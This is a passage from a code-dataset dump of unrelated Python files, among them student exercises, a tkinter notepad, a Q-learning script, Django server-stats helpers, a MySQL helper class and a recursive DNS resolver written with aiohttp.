executor.submit(consumer)\n","repo_name":"gtortone/corso-pcd","sub_path":"esercizi/me-first.py","file_name":"me-first.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72729164372","text":"__author__ = 'ESU'\n\n# Problem Solving with Algorithms and Data Structures\n# Brad Miller, David Ranum\n# http://interactivepython.org/runestone/static/pythonds/index.html\n\nfrom ch3_DataStructures import Deque\nimport unittest\n\nclass TestExamples(unittest.TestCase):\n\n def test_pal_checker_false(self):\n input_str = \"lsdkjfskf\"\n self.assertFalse(pal_checker(input_str))\n\n def test_pal_checker_true(self):\n input_str = \"radar\"\n self.assertTrue(pal_checker(input_str))\n\n\ndef pal_checker(input_str):\n char_deque = Deque()\n\n for ch in input_str:\n char_deque.addRear(ch)\n\n still_equal = True\n\n while char_deque.size() > 1 and still_equal:\n first = char_deque.removeFront()\n last = char_deque.removeRear()\n if first != last:\n still_equal = False\n\n return still_equal\n\n\ndef main():\n print(pal_checker(\"lsdkjfskf\"))\n print(pal_checker(\"radar\"))\n\nif __name__ == '__main__':\n # unittest.main()\n main()","repo_name":"ericsu378/Miller_Python_DS_Alg","sub_path":"Chapter3/ch13_18_deques.py","file_name":"ch13_18_deques.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40735414059","text":"from tkinter import *\nfrom tkinter.filedialog import askopenfilename, askopenfilenames, asksaveasfilename\nimport os\n\n\nclass notepad(Tk):\n def __init__(self):\n super().__init__()\n self.geometry(\"550x400\")\n self.maxsize(width=550, height=400)\n self.minsize(width=250, height=280)\n self.title(\"untitled - notepad\")\n self.config(bg=\"white\")\n self.file = None\n self.sbar = Scrollbar(self)\n self.sbar.pack(side=RIGHT, fill=Y)\n self.txt = Text(self, font=\"lucida 10\")\n self.txt.pack(expand=True, fill=BOTH)\n self.txt.config(yscrollcommand=self.sbar.set)\n self.sbar.config(command=self.txt.yview)\n self.menubar()\n\n def newfile(self):\n self.title(\"untitled\")\n self.file = None\n self.txt.delete(1.0, END)\n\n def openfile(self):\n self.file = askopenfilename(defaultextension=\".txt\", filetypes=[\n (\"all Files\", \"*.*\"), (\"Text Document\", \"*.txt\")])\n if self.file == \"\":\n self.file = None\n else:\n self.txt.delete(1.0, END)\n self.title(os.path.basename(self.file))\n with open(self.file, \"r\") as f:\n f = f.read()\n self.txt.insert(1.0, f)\n\n def savefile(self):\n if self.file == None:\n self.file = asksaveasfilename(initialfile='untitled.txt', defaultextension=\".txt\", filetypes=[\n (\"all Files\", \"*.*\"), (\"Text Document\", \"*.txt\")])\n if self.file == \"\":\n self.file = None\n else:\n with open(self.file, \"w\") as f:\n f.write(self.txt.get(1.0, END))\n self.title(os.path.basename(self.file))\n\n def menubar(self):\n self.menu_b = Menu(self)\n self.filemenu = Menu(self.menu_b, tearoff=0)\n self.filemenu.add_command(label=\"New file\", command=self.newfile)\n self.filemenu.add_command(label=\"open file\", command=self.openfile)\n self.filemenu.add_command(label=\"Save as\", command=self.savefile)\n self.filemenu.add_separator()\n self.menu_b.add_cascade(label=\"File\", menu=self.filemenu)\n self.menu_b.add_command(label=\"Word Wrap\",command=self.launch)\n self.config(menu=self.menu_b)\n #######################\n def launch(self):\n root=Tk()\n root.title(\"word wrap\")\n root.geometry(\"400x320\")\n root.maxsize(width=300,height=400)\n root.config(bg=\"white\")\n self.f1=Frame(root,bg=\"white\",bd=5,width=160,height=200,cursor=\"target\",relief=RIDGE)\n ### buttons for font selection\n self.btn1=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn2=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn3=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn4=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn5=Button(self.f1,bg=\"white\",fg=\"black\",text=\"ABCDE abcd\")\n self.btn1.place(x=27,y=8)\n self.btn2.place(x=27,y=41)\n self.btn3.place(x=27,y=74)\n self.btn4.place(x=27,y=107)\n self.btn5.place(x=27,y=140)\n Label(root,text=\"select font\",bg=\"white\",fg=\"black\",font=\"roman 13 bold\").place(x=28,y=8)\n self.f1.place(x=20,y=33)\n root.mainloop()\n\n\n\n\nnote = notepad()\n# f_edit= FontEditMenu()\n# f_edit.menubarf()\n# f_edit.mainloop()\nnote.mainloop()\n","repo_name":"Pggeeks/tkinter-notepad","sub_path":"notepadtk.py","file_name":"notepadtk.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"35502000370","text":"class PhanSo():\n def __init__(self, tu, mau):\n self.tu = int(tu)\n self.mau = int(mau)\n\n def ucln(self):\n a = self.tu\n b = self.mau\n while b != 0:\n x = a % b\n a, b = b, x\n return a\n def Tu(self, PhanSo):\n return self.tu * PhanSo.mau + self.mau * PhanSo.tu\n\n def Mau(self, PhanSo):\n return self.mau * PhanSo.mau\n\n\ndef ucln(a, b):\n while b != 0:\n x = a % b\n a, b = b, x\n return a\n\narr = input().split()\nps1 = PhanSo(arr[0], arr[1])\nps2 = PhanSo(arr[2], arr[3])\ntu = ps1.Tu(ps2)\nmau = ps1.Mau(ps2)\nprint(f\"{tu//ucln(tu, mau)}/{mau//ucln(tu, mau)}\")\n\n\n\n\n","repo_name":"HieuGITLAB/CODEPTIT","sub_path":"lopphanso-2.py","file_name":"lopphanso-2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3639084805","text":"import numpy as np\r\nimport gym\r\nimport random\r\n\r\n\r\nenv = gym.make(\"FrozenLake-v0\")\r\nenv.render()\r\n\r\naction_size = env.action_space.n\r\nstate_size = env.observation_space.n\r\nqtable = np.zeros((state_size,action_size))\r\n\r\ntotal_episodes = 100000\r\ntotal_test_episodes = 1000\r\n\r\nmax_steps = 999\r\n\r\nlearning_rate = 0.7\r\ngamma = 0.95\r\nepsilon = 1.0\r\nmax_epsilon = 1.0\r\nmin_epsilon = 0.01\r\ndecay_rate = 0.01\r\n\r\naverage = 0\r\nfor episode in range(total_test_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n total_reward = 0\r\n for step in range(max_steps):\r\n action = np.argmax(qtable[state,:])\r\n newState,reward,done,_ = env.step(action)\r\n total_reward += reward\r\n state = newState\r\n if done:\r\n break\r\n average += total_reward\r\n\r\nprint(average/total_test_episodes)\r\n\r\nfor episode in range(total_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n for step in range(max_steps):\r\n randEps = random.uniform(0,1)\r\n if randEps > epsilon:\r\n action = np.argmax(qtable[state,:])\r\n else:\r\n action = env.action_space.sample()\r\n \r\n newState, reward, done, info = env.step(action)\r\n \r\n qtable[state,action] = qtable[state,action] + learning_rate * (reward + gamma*np.max(qtable[newState,:]) - qtable[state,action])\r\n \r\n state = newState\r\n \r\n if done:\r\n break\r\n \r\n epsilon = min_epsilon + (max_epsilon - min_epsilon * np.exp(-decay_rate*episode))\r\n\r\naverage = 0\r\nfor episode in range(total_test_episodes):\r\n state = env.reset()\r\n step = 0\r\n done = False\r\n total_reward = 0\r\n for step in range(max_steps):\r\n action = np.argmax(qtable[state,:])\r\n newState,reward,done,_ = env.step(action)\r\n total_reward += reward\r\n state = newState\r\n if done:\r\n break\r\n average += total_reward\r\n\r\nprint(average/total_test_episodes)","repo_name":"m1234d/rl-projects","sub_path":"QLearning/FrozenLake/frozenlake.py","file_name":"frozenlake.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16195582396","text":"def fu(xx):\n tmp = []\n for x in (el for el in range(1, xx, 3)):\n yield x\n\n\ntry:\n with open('text_5-5_nums.txt', \"w\", encoding=\"utf-8\") as new_file:\n for el in fu(20):\n print(f'{el}', end=\" \", file=new_file)\n try:\n with open('text_5-5_nums.txt') as num_file:\n summ = 0\n for line in num_file:\n tmp_list = map(int, line.split())\n for num in tmp_list:\n summ += num\n print(summ)\n except:\n print('Ошибка обработки файла, программа завершена !')\nexcept:\n print('Ошибка генерации файла')\n","repo_name":"tedavydov/python2020","sub_path":"Lesson5/Lesson5_DZ5.py","file_name":"Lesson5_DZ5.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3924787015","text":"import collections\nclass Solution(object):\n def shortestPathLength(self, graph):\n N = len(graph)\n queue = collections.deque((1 << x, x) for x in range(N))\n dist = collections.defaultdict(lambda: float('inf'))\n for x in range(N): dist[1 << x, x] = 0\n\n while queue:\n cover, head = queue.popleft()\n d = dist[cover, head]\n if cover == 2**N - 1: return d\n for child in graph[head]:\n cover2 = cover | (1 << child)\n if d + 1 < dist[cover2, child]:\n dist[cover2, child] = d + 1\n queue.append((cover2, child))","repo_name":"YunYouJun/LeetCode","sub_path":"problems/shortest-path-visiting-all-nodes/solution-1.py","file_name":"solution-1.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"27880417994","text":"import json\nimport datetime\nimport subprocess\nfrom models import ServerStats, AdminUsers\nfrom channels import Group, channel_layers\nfrom django.db import connection\nfrom User.userhelper import verifyPassword\nfrom Server.config import START_DATETIME\n\n\ndef login(username, password):\n\t\"\"\"\n\tAttempt to authenticate the admin user\n\t\"\"\"\n\tadmin = AdminUsers.objects.filter(username=username)\n\tif admin:\n\t\tadmin = admin[0]\n\t\treturn verifyPassword(password, admin.password)\n\n\treturn False\n\ndef send_keepalive_ping():\n\t\"\"\"\n\tHelper function to send a ping to the client.\n\tWas intended to help daphne determine which socket connections have expired.\n\tCleanup doesn't seem to be working well, this will likely go away.\n\t\"\"\"\n\tGroup(\"activeUsers\").send({\"text\": json.dumps({\"PING\": \"PING\"})})\n\ndef get_num_active_users():\n\t\"\"\"\n\tObtain the number of websockets connected to the server\n\t\"\"\"\n\treturn len(channel_layers.backends['default'].channel_layer.group_channels('activeUsers'))\n\ndef get_server_uptime():\n\t\"\"\"\n\tObtain the amount of time the server has been up and running\n\t\"\"\"\n\treturn datetime.datetime.now() - START_DATETIME\n\ndef get_local_disk_usage():\n\t\"\"\"\n\tObtains the local disk usage for the server using the df command\n\t\"\"\"\n\ttotal_disk_size = subprocess.check_output(\"df -h / | tail -1 | awk '{print $2}'\", shell=True)\n\tused_disk_amount = subprocess.check_output(\"df -h / | tail -1 | awk '{print $3}'\", shell=True)\n\n\treturn used_disk_amount, total_disk_size\n\ndef get_total_db_rows():\n\t\"\"\"\n\tCalculates the total number of rows in all of the tables\n\t\"\"\"\n\twith connection.cursor() as cursor:\n\t\tcursor.execute(\"SELECT SUM(n_live_tup) FROM (SELECT schemaname,relname,n_live_tup FROM pg_stat_user_tables ORDER BY n_live_tup DESC) asdf;\")\n\t\trow = cursor.fetchone()\n\t\trow_count = row[0]\n\n\treturn row_count\n\ndef get_all_command_perf_data():\n\t\"\"\"\n\tObtains all of the performance data for requests\n\t\"\"\"\n\trequest_duration = ServerStats.objects.filter(name='request_duration')\n\tif request_duration:\n\t\trequest_duration = request_duration[0]\n\t\tdata = json.loads(request_duration.value)\n\t\tcommands = []\n\t\taverage_data = {\"value\": data[\"average\"][\"value\"], \"total\": data[\"average\"][\"total\"]}\n\t\tfastest_data = {\"value\": float(\"inf\"), \"name\": None}\n\t\tslowest_data = {\"value\": -1.0, \"name\": None}\n\t\tfor cmd in data['commands']:\n\t\t\ttotal = data['commands'][cmd]['average_time']['total']\n\t\t\taverage = data['commands'][cmd]['average_time']['value']\n\t\t\tfastest = data['commands'][cmd]['fastest_time']\n\t\t\tslowest = data['commands'][cmd]['slowest_time']\n\t\t\tcommands.append({\"name\": cmd, \"total\": total, \"average\": average, \"fastest\": fastest, \"slowest\": slowest})\n\n\t\t\tif fastest < fastest_data[\"value\"]:\n\t\t\t\tfastest_data[\"value\"] = fastest\n\t\t\t\tfastest_data[\"name\"] = cmd\n\n\t\t\tif slowest > slowest_data[\"value\"]:\n\t\t\t\tslowest_data[\"value\"] = slowest\n\t\t\t\tslowest_data[\"name\"] = cmd\n\n\t\treturn commands, average_data, fastest_data, slowest_data\n\telse:\n\t\tcommands = []\n\t\taverage_data = {\"value\": \"\", \"total\": 0}\n\t\tfastest_data = {\"value\": \"\", \"name\": \"-\"}\n\t\tslowest_data = {\"value\": \"\", \"name\": \"-\"}\n\t\treturn commands, average_data, fastest_data, slowest_data\n\ndef _calculate_new_average(average, total, new_value):\n\t\"\"\"\n\tHelper function to re-calculate an average\n\t\"\"\"\n\treturn ((average * total) + new_value) / (total + 1)\n\ndef archive_request_duration(start_time, end_time, command):\n\t\"\"\"\n\tArchive request statistics for every request to the server.\n\tThis function should be run in a separate thread.\n\t\"\"\"\n\trequest_duration = ServerStats.objects.filter(name='request_duration')\n\trequest_time = (end_time - start_time) * 1000\n\n\tif request_duration:\n\n\t\t# Obtain the request_duration entry\n\t\trequest_duration = request_duration[0]\n\t\tdata = json.loads(request_duration.value)\n\n\t\t# Obtain the request average and total\n\t\taverage = float(data['average']['value'])\n\t\ttotal = int(data['average']['total'])\n\n\t\t# Calculate the new average\n\t\tdata['average']['value'] = _calculate_new_average(average, total, request_time)\n\t\tdata['average']['total'] = total + 1\n\n\t\t# First time the command is getting archived\n\t\tif not command in data['commands']:\n\t\t\tdata[\"commands\"][command] = {}\n\t\t\tdata[\"commands\"][command]['fastest_time'] = request_time\n\t\t\tdata[\"commands\"][command]['slowest_time'] = request_time\n\t\t\tdata[\"commands\"][command]['average_time'] = {\"value\": request_time, \"total\": 1}\n\n\t\t# Command has already been archived, update its data\n\t\telse:\n\t\t\t# Calculate whether the request sets a fastest or slowest record for the command\n\t\t\tfastest_time = float(data[\"commands\"][command]['fastest_time'])\n\t\t\tslowest_time = float(data[\"commands\"][command]['slowest_time'])\n\t\t\tif request_time < fastest_time:\n\t\t\t\tdata[\"commands\"][command]['fastest_time'] = request_time\n\t\t\telif request_time > slowest_time:\n\t\t\t\tdata[\"commands\"][command]['slowest_time'] = request_time\n\n\t\t\t# Re-calculate the average request time for the command\n\t\t\taverage_time = float(data[\"commands\"][command]['average_time']['value'])\n\t\t\ttotal = int(data[\"commands\"][command]['average_time']['total'])\n\t\t\tdata[\"commands\"][command]['average_time']['total'] = total + 1\n\t\t\tdata[\"commands\"][command]['average_time']['value'] = _calculate_new_average(average_time, total, request_time)\n\n\telse:\n\t\t# Request stats don't exist, create an entry for it\n\t\trequest_duration = ServerStats()\n\t\trequest_duration.name = 'request_duration'\n\n\t\tdata = {\n\t\t\t\"average\": {\"value\": str(request_time), \"total\": 1},\n\t\t\t\"commands\": {command: {\"fastest_time\": request_time, \"slowest_time\": request_time, \"average_time\": {\"value\": request_time, \"total\": 1}}}\n\t\t}\n\n\t# Update the stats data\n\trequest_duration.value = json.dumps(data)\n\trequest_duration.save()","repo_name":"DBN16CO/Tactics","sub_path":"Server/Admin/admin_utils.py","file_name":"admin_utils.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"71741501974","text":"# https://msiqoc.tistory.com/28\n\nfrom itertools import combinations\n\ndef solution(relation):\n answer = 0\n rows = len(relation)\n cols = len(relation[0])\n \n #유일성\n candidates = []\n for i in range(1, cols+1):\n candidates.extend(combinations(range(cols), i)) \n \n final = []\n for c in candidates:\n tmp = [tuple(item[key] for key in c) for item in relation] \n if len(set(tmp)) == rows:\n final.append(c)\n \n answer = set(final) \n \n # 최소성\n for i in range(len(final)):\n for j in range(i+1, len(final)):\n if len(final[i]) == len(set(final[i]).intersection(set(final[j]))):\n answer.discard(final[j])\n \n return len(answer)","repo_name":"devyuseon/problem-solving","sub_path":"programmers/2019_kakao_blind/후보키.py","file_name":"후보키.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29402551658","text":"import pandas as pd\r\nimport numpy as np\r\nfrom tensorflow.python.keras.models import Sequential\r\nfrom tensorflow.python.keras.layers import Dense,Dropout,SimpleRNN\r\nfrom preprocess import *\r\n\r\n\r\ndef RNN_base(hidden_units:int, dense_units:int, X_train:pd.DataFrame):\r\n model = Sequential()\r\n # 1st RNN layer and Dropout regularization\r\n # model.add(SimpleRNN(units=50, activation='relu', return_sequences=True, input_shape=(x_train_.shape[1], 1)))\r\n X = np.array(X_train).reshape([-1, X_train.shape[1], 1])\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True, input_shape=X))\r\n model.add(Dropout(0.2))\r\n # 2nd RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True))\r\n model.add(Dropout(0.2))\r\n # 3rd RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50, activation='relu', return_sequences=True))\r\n model.add(Dropout(0.2))\r\n # 4th RNN layer and Dropout regularization\r\n model.add(SimpleRNN(units=50))\r\n model.add(Dropout(0.2))\r\n # output layer\r\n model.add(Dense(units=1), activation='sigmoid')\r\n\r\n return model\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"JumpyzZ/CS760_IoT_Traffic_Classification","sub_path":"RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73736789652","text":"import mysql.connector\nfrom Classes.constants import CREDENTIALS\n\n\nclass Sql:\n \"\"\"\n This class manages all interactions with the db\n \"\"\"\n\n\n def __init__(self):\n \"\"\"\n Constructor of the class, which initialise the connection to the db\n \"\"\"\n self.mydb = mysql.connector.connect(\n host=CREDENTIALS[\"host\"],\n user=CREDENTIALS[\"username\"],\n passwd=CREDENTIALS[\"password\"],\n database=CREDENTIALS[\"dbname\"]\n )\n self.mycursor = self.mydb.cursor(buffered=True)\n \"\"\"self.reset_database()\"\"\"\n\n def create_new_category(self, name):\n \"\"\"\n Create a new entry in the CATEGORIES table\n \"\"\"\n query = \"INSERT INTO Categories(nom) VALUES (%s)\"\n self.mycursor.execute(query, (name,))\n self.mydb.commit()\n return self.mycursor.lastrowid\n\n def create_new_product(self, name, grade, url, stores, id_category):\n \"\"\"\n Create a new entry in the PRODUCT table\n \"\"\"\n query = \"INSERT INTO Products(nom, grade, url, stores, id_categories) VALUES (%s, %s, %s, %s, %s)\"\n self.mycursor.execute(query, (name, grade, url, stores, id_category,))\n self.mydb.commit()\n\n def create_new_substitute(self, id_product, id_substitute_product):\n \"\"\"\n Create a new entry in the SUBSTITUTE table\n \"\"\"\n query = \"INSERT INTO Substitute(id_product, id_substitute_product) VALUES (%s, %s)\"\n self.mycursor.execute(query, (id_product, id_substitute_product,))\n self.mydb.commit()\n\n def suggest(self, id_categories):\n \"\"\"\n Return the first product with \"a\" grade in the same chosen product category\n \"\"\"\n query = \"SELECT * FROM products WHERE grade = 'a' AND id_categories = %s \"\n self.mycursor.execute(query, (id_categories,))\n return self.mycursor.fetchone()\n\n def get_product_name_by_id(self, id_product):\n \"\"\"\n Return the name of the product for the given id\n \"\"\"\n query = \"SELECT nom FROM products WHERE id_product = %s\"\n self.mycursor.execute(query, (id_product,))\n return self.mycursor.fetchone()\n\n def get_all_substitute(self):\n \"\"\"\n Return all substitute from the table SUBSTITUTE\n \"\"\"\n query = \"SELECT * FROM substitute \"\n self.mycursor.execute(query)\n return self.mycursor.fetchall()\n\n def suggest_all_categories(self):\n \"\"\"\n Return all the products where grade = \"a\"\n \"\"\"\n query = \"SELECT * FROM products WHERE grade = 'a'\"\n self.mycursor.execute(query)\n return self.mycursor.fetchone()\n\n def get_categories(self):\n \"\"\"\n Return all categories in the table CATEGORIES\n \"\"\"\n query = \"SELECT * FROM categories\"\n self.mycursor.execute(query)\n return self.mycursor.fetchall()\n\n def get_products_by_cat(self, id_categories):\n \"\"\"\n Return all product for the given category id\n \"\"\"\n query = \"SELECT * FROM products WHERE id_categories = %s\"\n self.mycursor.execute(query, (id_categories,))\n return self.mycursor.fetchall()\n\n def reset_database(self):\n \"\"\"\n Drop and reset the database from scratch by creating the 3 tables after deleting them\n \"\"\"\n # Reset Database + Création Database (pour reboot) #\n\n self.mycursor.execute(\"DROP DATABASE IF exists mydatabase\")\n self.mycursor.execute(\"CREATE DATABASE IF NOT exists mydatabase\")\n self.mycursor.execute(\"USE mydatabase\")\n # Création des deux tables #\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Categories(id_categories INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"nom VARCHAR(40))\")\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Products(id_product INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"nom VARCHAR(255) NOT NULL, \"\n \"grade ENUM('a', 'b', 'c', 'd', 'e', 'X') NOT NULL,\"\n \"url VARCHAR(255),\"\n \"stores VARCHAR(255),\"\n \"id_categories INT,\"\n \"FOREIGN KEY (id_categories) REFERENCES Categories(id_categories))\")\n self.mycursor.execute(\n \"CREATE TABLE IF NOT exists Substitute(id_substitute INT PRIMARY KEY NOT NULL AUTO_INCREMENT,\"\n \"id_product INT NOT NULL,\"\n \"id_substitute_product INT NOT NULL,\"\n \"FOREIGN KEY (id_product) REFERENCES Products(id_product),\"\n \"FOREIGN KEY (id_substitute_product) REFERENCES Products(id_product))\")\n","repo_name":"Zyllane/Open-FactFood","sub_path":"Classes/sql.py","file_name":"sql.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32832976848","text":"import unittest\nfrom tree.tree import Tree, Node\n\n\nclass Test(unittest.TestCase):\n\n def setUp(self):\n self.answer1 = [[1]]\n self.answer2 = [[\"|\", \"|\", \"|\", 1, \"|\", \"|\", \"|\"],\n [\"|\", 2, \"|\", \"|\", \"|\", \"|\", \"|\"],\n [3, \"|\", \"|\", \"|\", \"|\", \"|\", \"|\"]]\n self.answer3 = [[\"|\", \"|\", \"|\", 1, \"|\", \"|\", \"|\"],\n [\"|\", 2, \"|\", \"|\", \"|\", 3, \"|\"],\n [4, \"|\", 5, \"|\", 6, \"|\", 7]]\n self.answer4 = [[\"|\", \"|\", \"|\", 7, \"|\", \"|\", \"|\"],\n [\"|\", 9, \"|\", \"|\", \"|\", 6, \"|\"],\n [\"|\", \"|\", 4, \"|\", 2, \"|\", \"|\"]]\n\n # test base case, only root in the tree\n def test1(self):\n a = Node(1, None, None)\n tree1 = Tree(a)\n assert tree1.print_tree() == self.answer1\n\n # test when there is only left child\n def test2(self):\n c = Node(3, None, None)\n b = Node(2, c, None)\n a = Node(1, b, None)\n tree2 = Tree(a)\n assert tree2.print_tree() == self.answer2\n\n # test for a full tree\n def test3(self):\n d = Node(4, None, None)\n e = Node(5, None, None)\n f = Node(6, None, None)\n g = Node(7, None, None)\n b = Node(2, d, e)\n c = Node(3, f, g)\n a = Node(1, b, c)\n tree3 = Tree(a)\n assert tree3.print_tree() == self.answer3\n\n # test for a full tree\n def test4(self):\n d = Node(4, None, None)\n e = Node(2, None, None)\n b = Node(9, None, d)\n c = Node(6, e, None)\n a = Node(7, b, c)\n tree4 = Tree(a)\n assert tree4.print_tree() == self.answer4\n","repo_name":"smallwhiterabbite/ORIE-5270","sub_path":"hw2/tests/test_tree.py","file_name":"test_tree.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38268017012","text":"\nfrom threading import Thread\n\nglobal i\ni = 0\n\ndef createThread1():\n global i\n for n in range (0,1000000):\n i = i +1\n\ndef createThread2():\n global i\n for n in range (0,1000000):\n i = i -1\n\n\n\ndef main():\n thread_1 = Thread( target = createThread1, args=(),)\n thread_1.start()\n thread_2 = Thread( target = createThread2, args =(),)\n thread_2.start()\n\n \n thread_1.join()\n thread_2.join()\n\n print(\"hello\")\n print(i)\n\n\n\n\nmain()\n","repo_name":"Monskil/Gomp","sub_path":"Exercises/Exercise 1/task1inpython.py","file_name":"task1inpython.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"40966552448","text":"from aiohttp import web\nimport time\nimport typing as tp\n\nimport cache\nimport dns_request\n\n\nasync def handler(request: web.Request) -> web.Response:\n domain = request.query.get(\"domain\").lower()\n if not domain or not valid(domain):\n return web.json_response(text=\"Domain must be specified and valid\", status=404)\n\n do_trace = request.query.get(\"trace\") is not None\n writer = ResponseWriter(do_trace)\n\n addresses = None\n if not do_trace:\n addresses = request.app['cache'].get(domain)\n\n if addresses is None:\n addresses = await find_recursive(domain, root_dns_servers, writer)\n if addresses is not None:\n request.app['cache'][domain] = addresses\n\n if addresses is None:\n writer.write_forced(\"Couldn't find ip for domain\")\n return web.json_response(text=writer.result(), status=404)\n writer.write(\"\")\n writer.write_forced(\"\\n\".join(map(lambda ip: f\"{ip} {domain}\", addresses.ips)))\n return web.json_response(text=writer.result())\n\n\nasync def find_recursive(domain: str, dns_servers: tp.Dict[str, str], writer) -> tp.Optional[cache.Record]:\n for server_domain, host in dns_servers.items():\n writer.write(f\"{host} {server_domain}\")\n response = dns_request.send(domain, host)\n if not response:\n continue\n\n if response.aa:\n ips = []\n ttl = 0\n for record in response.a_records:\n if record.domain.startswith(domain):\n ips.append(str(record.ip))\n ttl = record.ttl\n if not ips:\n return None\n return cache.Record(deadline=time.time() + ttl, ips=ips)\n\n new_domains = [record.domain for record in response.ns_records]\n new_servers = {}\n for a_record in response.a_records:\n if a_record.domain not in new_domains:\n continue\n new_servers[a_record.domain] = a_record.ip\n if not new_servers:\n if new_domains:\n # try to find domains recursively\n writer.write(\"\")\n result = await find_recursive(new_domains[0], root_dns_servers, writer)\n if result:\n dns_servers = {}\n for ip in result.ips:\n dns_servers[new_domains[0]] = ip\n writer.write(\"\")\n return await find_recursive(domain, dns_servers, writer)\n continue\n writer.write(\"\")\n return await find_recursive(domain, new_servers, writer)\n return None\n\n\ndef valid(domain: str) -> bool:\n for ch in domain:\n if not (ch.isalnum() or ch in \".-\"):\n return False\n labels = domain.split(\".\")\n if not labels[-1]:\n labels.pop()\n for label in labels:\n if not label or label.startswith((\".\", \"-\")):\n return False\n return True\n\n\nclass ResponseWriter:\n def __init__(self, do_trace=False):\n self.do_trace = do_trace\n self.parts = []\n\n def write(self, data: str):\n if self.do_trace:\n self.parts.append(data)\n\n def write_forced(self, data: str):\n self.parts.append(data)\n\n def result(self):\n return \"\\n\".join(self.parts)\n\n\nroot_dns_servers = {\n \"a.root-servers.net\": '198.41.0.4',\n \"b.root-servers.net\": '199.9.14.201',\n \"c.root-servers.net\": '192.33.4.12',\n \"d.root-servers.net\": '199.7.91.13',\n \"e.root-servers.net\": '192.203.230.10',\n \"f.root-servers.net\": '192.5.5.241',\n \"g.root-servers.net\": '192.112.36.4',\n \"h.root-servers.net\": '198.97.190.53',\n \"i.root-servers.net\": '192.36.148.17',\n \"j.root-servers.net\": '192.58.128.30',\n \"k.root-servers.net\": '193.0.14.129',\n \"l.root-servers.net\": '199.7.83.42',\n \"m.root-servers.net\": '202.12.27.33',\n}\n","repo_name":"pkositsyn/network","sub_path":"recursor/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16362771352","text":"import random\n\n# ask for users name\nprint('What is your name?')\nname = input()\n# validate? nah\n\n# pick a random number from 1-20\nnumber = random.randint(1,20)\nprint('Hello,', name, 'I am thinking of a number between 1 and 20')\n\nguess = '' # start with empty string for edge case where user inputs only garbage\n\n# ask for guesses\nfor guessCount in range(1,7): # I forgot that it tells you i at the end, so this should be (1,7) instead of (0,6)\n print('Take a guess')\n try:\n guess = int(input())\n except:\n print('hmm. that does not seem to be a number.')\n continue # go back to start of loop to ask for another guess\n # compare guess to number\n if guess > number: # if high, tell\n print('too high')\n continue # go back to start of loop to ask for another guess\n elif guess < number:# if just right, finish\n print('too low')\n continue # go back to start of loop to ask for another guess\n else: # if just right, finish\n# sys.exit() # unnecessary. Just break out of the for loop and then check if number == guess\n break\nif guess == number: # if they're the same, you guessed correctly\n print('Good job', name + '! It took you', guessCount, 'guesses.') # this is how Al did it in the video. I'm very surprised that the counter guessCount is available after the for loop terminates. Also, print('string', int + 'string) works, but seems sketchy\nelse: # if too many guesses, you failed\n print('Nope. The number was', number)\n","repo_name":"erikbaxstrom/4--AutomateTheBoringStuffWithPython-Lesson12","sub_path":"numberGuessingGame.py","file_name":"numberGuessingGame.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26693616892","text":"#An example of using the library \nfrom library import *\n\nlib = Library('PicsArtLib')\n\nb1 = Book('Dive Into Systems', 814)\nb2 = Book('Practical Binary Analysis', 460)\nb3 = Book('OOAD with Applications', 717)\nb4 = Book('Learning Python', 1213)\nb5 = Book('Effective Python', 469)\nb6 = Book('Compilers: Principles, Techniques, and Tools', 1040)\n\nlib.addBook(b1, 1)\nlib.addBook(b2, 2)\nlib.addBook(b3, 5)\nlib.addBook(b4, 3)\nlib.addBook(b5, 